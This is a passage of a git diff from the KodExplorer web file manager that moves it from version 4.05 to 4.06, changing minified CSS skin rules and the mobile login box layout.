.aui-close:hover{background-color:#e81123;color:#fff;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAOklEQVQYV2P4/+//+f/fv6cw4AAgOZAaCAMEsCjGkMOmGKcByBL4bEFVjE8R0QqJspoozxAdPMQGOABXELkNcbMs5wAAAABJRU5ErkJggg==");}body .aui-state-focus .aui-outer{box-shadow:0px 0px 20px rgba(0,140,255,0.46);border:1px solid #71b9f3;}body .dialog-copyright.dialog-simple .aui-close,body .share-dialog.dialog-simple .aui-close,body .check-version-dialog.dialog-simple .aui-close{opacity:0.6;background:rgba(0,0,0,0.4);}body .dialog-copyright.dialog-simple .aui-close:before,body .share-dialog.dialog-simple .aui-close:before,body .check-version-dialog.dialog-simple .aui-close:before{content:"\f00d";background-image:none;}body .dialog-copyright.dialog-simple .aui-close:hover,body .share-dialog.dialog-simple .aui-close:hover,body .check-version-dialog.dialog-simple .aui-close:hover{background-image:none;}body div.dialog-simple .aui-title{border-radius:0;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{background-color:rgba(255,255,255,0.8);border-radius:0;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:hover,body div.dialog-simple .aui-close:active{background-color:rgba(255,255,255,0.95);}body div.dialog-simple .aui-close{right:4px;}body div.dialog-simple .aui-close:hover,body div.dialog-simple .aui-close:active{background-color:#e81123;}body .do-search-box .search-desc{border-radius:0;background:#fefefe;border-bottom-color:#eee;}body .do-search-box .search-result{border-radius:0;}body .select-container{border:1px solid #195694;background-color:#62a2e4;}body .header-middle .btn-left-radius,body .header-middle .btn-right-radius,body .frame-header .header-content .header-right .btn-left-radius,body .frame-header .header-content .header-right .btn-right-radius{border-radius:0;}body .frame-main .frame-left{background:#fff;border-right:1px solid #eee;}body .frame-main .frame-left .ztree li a{margin:0 2px;border-color:transparent;}body .frame-main .frame-left .ztree li a:hover{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#e5f3ff;border-color:transparent;border-radius:0px;border-radius:0;filter:none;color:#335;}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#cce8ff;border-color:#99d1ff;border-radius:0px;filter:none;color:#335;}body .frame-main .frame-left .ztree li a.curSelectedNode .button.switch:after,body .frame-main .frame-left .ztree li a.curSelectedNode:hover .button.switch:after,body .frame-main .frame-left .ztree li a.curDropTreeNode .button.switch:after{color:inherit !important;}body .frame-main .frame-left .ztree li a span.button.switch:after{content:"\f105";font-size:16px;}body .frame-main .frame-left .ztree li a span.button.switch.noline_open:after,body .frame-main .frame-left .ztree li a span.button.switch.noline_open_hover:after{content:"\f107";font-weight:800;color:#76bdf7;}body .frame-main .frame-left .ztree li a span.button.switch.noline_docu:after{content:"";opacity:0;filter:alpha(opacity=0);}body .file-select{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#cce8ff;border-color:#99d1ff;border-radius:0px;filter:none;color:#335;}body .file-hover{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#e5f3ff;border-color:transparent;border-radius:0px;border-radius:0;filter:none;color:#335;}body div.file-continer.file-list-split .file.file2{background:none;}body div.file-continer.file-list-split .file.select-split-parent{background:#e3f0ff;}body div.file-continer.file-list-split .file.hover{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#e5f3ff;border-color:transparent;border-radius:0px;border-radius:0;filter:none;color:#335;}body div.file-continer .file{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;}body div.file-continer .file.file2{background:#fffbf1;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#cce8ff;border-color:#99d1ff;border-radius:0px;filter:none;color:#335;}body div.file-continer .file.hover{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#e5f3ff;border-color:transparent;border-radius:0px;border-radius:0;filter:none;color:#335;}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#cce8ff;border-color:#99d1ff;border-radius:0px;filter:none;color:#335;}body div.file-continer .file.select.file2,body div.file-continer .file.file-select-drag-temp.file2{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;background:#cce8ff;border-color:#99d1ff;border-radius:0px;filter:none;color:#335;}body div.file-continer.file-list-split .file,body div.file-continer.file-list-list .file{margin-bottom:1px;}body #main-title .filename:hover,body #main-title .filesize:hover,body #main-title .filetype:hover,body #main-title .filetime:hover,body #main-title .this{background:#e5f3ff;}body .context-menu-list{box-shadow:4px 5px 10px rgba(0,0,0,0.2);border-radius:0;border:1px solid rgba(0,0,0,0.1);background-clip:padding-box;}body .context-menu-list .context-menu-item{line-height:25px;height:25px;padding:0 15px 0 20px;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{background:#e1e1e1;color:#444;}body .context-menu-list .context-menu-item.hover .font-icon,body .context-menu-list .context-menu-item.selected.hover .font-icon{color:#888;}body .context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#888;}body .context-menu-list .hover > span > b{color:#888;}body #body .menu-left,body #body .app-menu-left{background:#fff;border-right:1px solid #f1f1f1;}body #body .menu-left h1,body #body .app-menu-left h1{font-weight:400;}body #body .menu-left .setting a:hover,body #body .app-menu-left .setting a:hover{background:#e6e6e6;}body #body .menu-left .setting a.selected,body #body .app-menu-left .setting a.selected{background:#e1e1e1;border-color:#ccc;}body #body .main .list{border-radius:0;}body #body .panel{margin-left:-1px;}body .frame-main .frame-right .frame-right-main .tools{border-color:#eee;}body .frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-radius:0;}body .task-tab{background:rgba(0,0,0,0.05);border-top:1px solid rgba(0,0,0,0.05);}body .task-tab .tabs .tab{border-radius:0px;box-shadow:0 0 1px #444;}body .task-tab .tabs .tab.this{box-shadow:0 0 6px #2196f3;border-color:#2196f3;}body .tasktab-dragging{box-shadow:0 0 6px #2196f3;border-color:#2196f3;}body div.tools .right .btn{background:#f3f3f3;border-radius:0;}body .edit-tab .tabs{border-bottom:1px solid #ddd;}body .edit-tab .tabs .tab{background:#f6f6f6;color:#666;}body .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#fff;}body .edit-tab .tabs .add{background:#ddd;border:1px solid #eee;color:#666;}body .edit-tab .tabs .tab.this,body .edit-tab .tabs .tab.this.hover{border-left:1px solid #63acff;margin-left:-1px;border-right-color:#63acff;}body .edit-tab .tabs .tab.this .close{opacity:0.4;filter:alpha(opacity=40);}body .edit-tab .tabs .tab.hover .close{opacity:0.7;filter:alpha(opacity=70);}body .edit-tab .tabs .edit-changed a.close{opacity:1;filter:alpha(opacity=100);}body .edit-tab .tabs .tab.this.edit-changed a.close{color:#fff;}body .edit-tab .draggable-dragging{background:#f6f6f6;border-left:3px solid #63acff;margin-left:-3px;} -/* ver 4.05(2017-08-26) [build 1503738071.1932] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.0676] */ \ No newline at end of file diff --git a/static/style/skin/win7.css b/static/style/skin/win7.css index 2106ce5..9a9f5b7 100755 --- a/static/style/skin/win7.css +++ b/static/style/skin/win7.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.0852] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.0141] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .topbar{background:url("./../../images/common/login.png") repeat-x 0px -44px;box-shadow:0 0 10px rgba(0,0,0,0.2);}body .topbar .content a.topbar-menu{border-color:#4499dd;border-color:rgba(255,255,255,0.1);}body .topbar .content a.topbar-menu.this,body .topbar .content a.topbar-menu:hover{background:#49d;background:rgba(255,255,255,0.4);border-color:rgba(255,255,255,0.1);}body .aui-border{background:url("./../../images/common/dialog/dialog.png") -200px 350px;}body .aui-state-focus .aui-title,body .aui-title{background:none;color:#444;text-shadow:0px 0px 0px #000, 0px 0px 1px #aaa, 0px 0px 4px #fff, 0px 0px 8px #fff;}body .aui-outer,body .aui-state-focus .aui-outer{border-radius:5px;text-align:left;background:url("./../../images/common/dialog/dialog.png") -100px 100px;border:1px solid #bbb;border-color:rgba(255,255,255,0.7);position:relative;box-shadow:0 0 8px rgba(0,0,0,0.5), 0 0 1px rgba(0,0,0,0.9);-webkit-transition:box-shadow 0.1s;-moz-transition:box-shadow 0.1s;-o-transition:box-shadow 0.1s;-ms-transition:box-shadow 0.1s;transition:box-shadow 0.1s;}body .aui-state-lock .aui-outer,body .aui-state-lock .aui-state-focus .aui-outer{border:1px solid #bbb;border-color:rgba(0,0,0,0.1);}body .aui-inner{border:1px solid #ddd;background:#fff;border-color:rgba(0,0,0,0.3);}body .aui-dialog{border-radius:2px;}body .aui-border{border-radius:4px;}body .aui-nw,body .aui-ne{width:4px;height:32px;}body .aui-sw,body .aui-se{width:4px;height:4px;}body .aui-nw,body .aui-n,body .aui-ne,body .aui-w,body .aui-e,body .aui-sw,body .aui-s,body .aui-se{background:#999 \9 !important;background:#fff;opacity:0.15;filter:alpha(opacity=15);}body .aui-title-bar{width:100%;height:0;position:relative;bottom:33px;_bottom:0;_margin-top:-33px;}body .aui-min,body .aui-min:hover,body .aui-min:active{right:81px;width:27px;background:url("./../../images/common/dialog/btn-min.png") no-repeat;}body .aui-max,body .aui-max:hover,body .aui-max:active{right:54px;width:27px;background:url("./../../images/common/dialog/btn-max.png") no-repeat;}body .aui-close,body .aui-close:hover,body .aui-close:active{right:5px;width:49px;background:url("./../../images/common/dialog/btn-close.png") no-repeat;}body .aui-max,body .aui-min,body .aui-close{position:absolute;text-decoration:none;-webkit-transition:none;-moz-transition:none;-o-transition:none;-ms-transition:none;transition:none;color:transparent;font-size:0px;cursor:pointer;z-index:10;top:-1px;height:19px;background-position:0 -19px;background-color:none;}body .aui-max:hover,body .aui-min:hover,body .aui-close:hover{background-position:0 -38px;}body .aui-max:active,body .aui-min:active,body .aui-close:active{background-position:0 0px;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{display:none;}body div.dialog-simple .aui-max,body div.dialog-simple .aui-min,body div.dialog-simple .aui-close{background-image:none;}body .dialog-max .aui-nw,body .dialog-max .aui-ne,body .dialog-max .aui-sw,body .dialog-max .aui-se,body .dialog-max .aui-w,body .dialog-max .aui-e{width:0px;}body .dialog-max .aui-sw,body .dialog-max .aui-n,body .dialog-max .aui-se{height:0px;}body .dialog-max .aui-outer{border:none;}body .dialog-max .aui-max{background:url("./../../images/common/dialog/btn-reg.png") 0 -19px;}body .dialog-max .aui-max:hover{background-position:0 -38px;}body .dialog-max .aui-max:active{background-position:0 0px;}body .aui-buttons{padding:8px;border-top:1px solid #eee;border-radius:0px 0px 3px 3px;}body .aui-buttons button{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#dddddd');background-image:-webkit-linear-gradient(top,#fff,#ddd);background-image:-moz-linear-gradient(top,#fff,#ddd);background-image:-o-linear-gradient(top,#fff,#ddd);background-image:-ms-linear-gradient(top,#fff,#ddd);background-image:linear-gradient(top,#fff,#ddd);-pie-background:linear-gradient(to top,#fff,#ddd);margin-left:15px;padding:6px 10px;border-radius:2px;height:auto;color:#333;border:solid 1px #999;text-shadow:0px 1px 1px #ffffff;box-shadow:0 1px 0 rgba(255,255,255,0.7), 0 -1px 0 rgba(0,0,0,0.09);-webkit-transition:box-shadow linear .2s;-moz-transition:box-shadow linear .2s;-o-transition:box-shadow linear .2s;-ms-transition:box-shadow linear .2s;transition:box-shadow linear .2s;}body .aui-buttons button:focus{outline:none 0;border-color:#426DC9;box-shadow:0 0 8px rgba(66,109,201,0.9);}body .aui-buttons button:hover{color:#000;border-color:#666;border-color:#426DC9;}body .aui-buttons button:active{border-color:#666;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#dddddd', endColorstr='#ffffff');background-image:-webkit-linear-gradient(top,#ddd,#fff);background-image:-moz-linear-gradient(top,#ddd,#fff);background-image:-o-linear-gradient(top,#ddd,#fff);background-image:-ms-linear-gradient(top,#ddd,#fff);background-image:linear-gradient(top,#ddd,#fff);-pie-background:linear-gradient(to top,#ddd,#fff);}body .aui-buttons button[disabled]{cursor:default;color:#666;background:#DDD;border:solid 1px #999;opacity:0.5;filter:alpha(opacity=50);box-shadow:none;}body .aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}body .aui-buttons button.aui-state-highlight{color:#FFF;border:solid 1px #1c6a9e;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#33bbee', endColorstr='#2288cc');background-image:-webkit-linear-gradient(top,#33bbee,#2288cc);background-image:-moz-linear-gradient(top,#33bbee,#2288cc);background-image:-o-linear-gradient(top,#33bbee,#2288cc);background-image:-ms-linear-gradient(top,#33bbee,#2288cc);background-image:linear-gradient(top,#33bbee,#2288cc);-pie-background:linear-gradient(to top,#33bbee,#2288cc);text-shadow:-1px -1px 1px #1c6a9e;}body .aui-buttons button.aui-state-highlight:hover{color:#FFF;border-color:#0F3A56;background:#2288cc;}body .aui-buttons button.aui-state-highlight:active{border-color:#1c6a9e;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#33bbee', endColorstr='#2288cc');background-image:-webkit-linear-gradient(top,#33bbee,#2288cc);background-image:-moz-linear-gradient(top,#33bbee,#2288cc);background-image:-o-linear-gradient(top,#33bbee,#2288cc);background-image:-ms-linear-gradient(top,#33bbee,#2288cc);background-image:linear-gradient(top,#33bbee,#2288cc);-pie-background:linear-gradient(to top,#33bbee,#2288cc);}body .check-version-dialog.dialog-simple .aui-title-bar{margin-top:-155px;}body .do-search-box .search-result{margin:15px;}body .dialog-no-title.aui-state-focus .aui-outer,body .dialog-no-title .aui-outer,body .dialog-no-title .aui-inner{border:none;}body .select-container{border:1px solid #004c99;background-color:#39f;}body .frame-main .bottom-box{border-color:#e6e6e6;}body .frame-main .frame-left{background:#fff;border-color:#e6e6e6;}body .frame-main .frame-left .ztree li a{border:1px solid #fafafa;border-color:transparent;margin:0px 4px 0 4px;-webkit-transition:none;-moz-transition:none;-o-transition:none;-ms-transition:none;transition:none;color:#333;padding:0px;padding-left:9px;vertical-align:top;}body .frame-main .frame-left .ztree li a:hover{border:1px solid #b3d9ff;color:#444;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6eeff');background-image:-webkit-linear-gradient(top,#fff,#e6eeff);background-image:-moz-linear-gradient(top,#fff,#e6eeff);background-image:-o-linear-gradient(top,#fff,#e6eeff);background-image:-ms-linear-gradient(top,#fff,#e6eeff);background-image:linear-gradient(top,#fff,#e6eeff);-pie-background:linear-gradient(to top,#fff,#e6eeff);}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{background:#cdf;color:#444;border:1px solid #39f;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f5f8ff', endColorstr='#ccddff');background-image:-webkit-linear-gradient(top,#f5f8ff,#cdf);background-image:-moz-linear-gradient(top,#f5f8ff,#cdf);background-image:-o-linear-gradient(top,#f5f8ff,#cdf);background-image:-ms-linear-gradient(top,#f5f8ff,#cdf);background-image:linear-gradient(top,#f5f8ff,#cdf);-pie-background:linear-gradient(to top,#f5f8ff,#cdf);box-shadow:0 0 1px #3377ff;}body .frame-main .frame-left .ztree li a.curSelectedNode .noline_open:after,body .frame-main .frame-left .ztree li a.curSelectedNode .noline_open_hover:after,body .frame-main .frame-left .ztree li a.curSelectedNode .noline_close:after,body .frame-main .frame-left .ztree li a.curDropTreeNode .noline_open:after,body .frame-main .frame-left .ztree li a.curDropTreeNode .noline_open_hover:after,body .frame-main .frame-left .ztree li a.curDropTreeNode .noline_close:after{color:#39f !important;}body .frame-main .frame-left .ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #1aa1ff inset !important;}body .frame-main .frame-left .ztree li a input.rename{margin-top:0px;height:22px;}body .file-select{background:#cdf;color:#444;border:1px solid #39f;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f5f8ff', endColorstr='#ccddff');background-image:-webkit-linear-gradient(top,#f5f8ff,#cdf);background-image:-moz-linear-gradient(top,#f5f8ff,#cdf);background-image:-o-linear-gradient(top,#f5f8ff,#cdf);background-image:-ms-linear-gradient(top,#f5f8ff,#cdf);background-image:linear-gradient(top,#f5f8ff,#cdf);-pie-background:linear-gradient(to top,#f5f8ff,#cdf);}body .file-hover{border:1px solid #b3d9ff;color:#444;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6eeff');background-image:-webkit-linear-gradient(top,#fff,#e6eeff);background-image:-moz-linear-gradient(top,#fff,#e6eeff);background-image:-o-linear-gradient(top,#fff,#e6eeff);background-image:-ms-linear-gradient(top,#fff,#e6eeff);background-image:linear-gradient(top,#fff,#e6eeff);-pie-background:linear-gradient(to top,#fff,#e6eeff);}body div.file-continer .file{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{background:#cdf;color:#444;border:1px solid #39f;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f5f8ff', endColorstr='#ccddff');background-image:-webkit-linear-gradient(top,#f5f8ff,#cdf);background-image:-moz-linear-gradient(top,#f5f8ff,#cdf);background-image:-o-linear-gradient(top,#f5f8ff,#cdf);background-image:-ms-linear-gradient(top,#f5f8ff,#cdf);background-image:linear-gradient(top,#f5f8ff,#cdf);-pie-background:linear-gradient(to top,#f5f8ff,#cdf);}body div.file-continer .file.hover{border:1px solid #b3d9ff;color:#444;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6eeff');background-image:-webkit-linear-gradient(top,#fff,#e6eeff);background-image:-moz-linear-gradient(top,#fff,#e6eeff);background-image:-o-linear-gradient(top,#fff,#e6eeff);background-image:-ms-linear-gradient(top,#fff,#e6eeff);background-image:linear-gradient(top,#fff,#e6eeff);-pie-background:linear-gradient(to top,#fff,#e6eeff);}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{background:#cdf;color:#444;border:1px solid #39f;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f5f8ff', endColorstr='#ccddff');background-image:-webkit-linear-gradient(top,#f5f8ff,#cdf);background-image:-moz-linear-gradient(top,#f5f8ff,#cdf);background-image:-o-linear-gradient(top,#f5f8ff,#cdf);background-image:-ms-linear-gradient(top,#f5f8ff,#cdf);background-image:linear-gradient(top,#f5f8ff,#cdf);-pie-background:linear-gradient(to top,#f5f8ff,#cdf);}body .file-continer .file .item-menu,body .ztree li a .menu-item{border-radius:2px;}body .dropdown-menu,body .topbar .content .top-right ul{-webkit-box-shadow:2px 3px 2px rgba(0,0,0,0.2);-moz-box-shadow:2px 3px 2px rgba(0,0,0,0.2);box-shadow:2px 3px 2px rgba(0,0,0,0.2);border:1px solid #ccc;border-radius:0;padding:3px;background:#f8f8f8;}body .dropdown-menu .this a,body .dropdown-menu a.this,body .topbar .content .top-right ul .this a,body .topbar .content .top-right ul a.this{background:#cdf;color:#444;border:1px solid #39f;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f5f8ff', endColorstr='#ccddff');background-image:-webkit-linear-gradient(top,#f5f8ff,#cdf);background-image:-moz-linear-gradient(top,#f5f8ff,#cdf);background-image:-o-linear-gradient(top,#f5f8ff,#cdf);background-image:-ms-linear-gradient(top,#f5f8ff,#cdf);background-image:linear-gradient(top,#f5f8ff,#cdf);-pie-background:linear-gradient(to top,#f5f8ff,#cdf);}body .dropdown-menu li > a,body .topbar .content .top-right ul li > a{-webkit-transition:transform 0.2s;-moz-transition:transform 0.2s;-o-transition:transform 0.2s;-ms-transition:transform 0.2s;transition:transform 0.2s;margin:0 2px;border:1px solid transparent;}body .dropdown-menu li > a:hover,body .dropdown-menu li > a:focus,body .topbar .content .top-right ul li > a:hover,body .topbar .content .top-right ul li > a:focus{border:1px solid #b3d9ff;color:#444;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6eeff');background-image:-webkit-linear-gradient(top,#fff,#e6eeff);background-image:-moz-linear-gradient(top,#fff,#e6eeff);background-image:-o-linear-gradient(top,#fff,#e6eeff);background-image:-ms-linear-gradient(top,#fff,#e6eeff);background-image:linear-gradient(top,#fff,#e6eeff);-pie-background:linear-gradient(to top,#fff,#e6eeff);}body .frame-main .frame-right frame-right-main .drop-menu-action a{padding:3px 30px;}body .context-menu-list{-webkit-box-shadow:2px 3px 2px rgba(0,0,0,0.3);-moz-box-shadow:2px 3px 2px rgba(0,0,0,0.3);box-shadow:2px 3px 2px rgba(0,0,0,0.3);border:1px solid #aaa;border-radius:0;padding:3px;background:#f1f1f1 url("./../../images/common/line.png") 28px 0 repeat-y;}body .context-menu-list .context-menu-item{padding:0px 15px 0 5px;border:1px solid #f8f8f8;border-color:transparent;-webkit-transition:none;-moz-transition:none;-o-transition:none;-ms-transition:none;transition:none;color:#333;}body .context-menu-list .context-menu-item .font-icon{width:17px;margin-left:-2px;}body .context-menu-list .context-menu-item.context-menu-separator{height:2px;background:url("./../../images/common/line_x.png") 27px no-repeat;margin:2px 0 2px;border-bottom:none;}body .context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}body .context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#444;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{border:1px solid #b3d9ff;color:#444;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6eeff');background-image:-webkit-linear-gradient(top,#fff,#e6eeff);background-image:-moz-linear-gradient(top,#fff,#e6eeff);background-image:-o-linear-gradient(top,#fff,#e6eeff);background-image:-ms-linear-gradient(top,#fff,#e6eeff);background-image:linear-gradient(top,#fff,#e6eeff);-pie-background:linear-gradient(to top,#fff,#e6eeff);color:#666;border-color:rgba(51,153,255,0.7);}body .context-menu-list .context-menu-item.hover .font-icon,body .context-menu-list .context-menu-item.selected.hover .font-icon{color:#666;}body .context-menu-list .context-menu-item.hover span > b,body .context-menu-list .context-menu-item.selected.hover span > b{color:#aaa;}body .context-menu-list .context-menu-item .selected,body .context-menu-list .context-menu-item .selected.hover{border-left:1px solid #b3d9ff;} -/* ver 4.05(2017-08-26) [build 1503738071.0852] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.0141] */ \ No newline at end of file diff --git a/static/style/wap/login.css b/static/style/wap/login.css index b5ed9c0..d9f336d 100755 --- a/static/style/wap/login.css +++ b/static/style/wap/login.css @@ -82,15 +82,15 @@ input:focus {border-color: #75A1F0; outline: none; box-shadow: 0 0 12px #75A1F0; .loginbox{ - margin:50px 20px 0; - background: #fff; + background:none; + margin: 20% auto 0; + width: 350px; border-radius: 4px; overflow: hidden; box-shadow: 0 15px 30px 0 rgba(0,0,1,.1); box-shadow:0 15px 30px 0 rgba(0,0,1,.1), 0 0 20px rgba(0,0,0,0.2) } -div .loginbox{background:none;} /*div .title{background: rgba(255,255,255,0.4);}*/ div .form{width: 100%;background: rgba(255,255,255,0.9);} div .inputs {padding: 10px 10px 0px 50px;}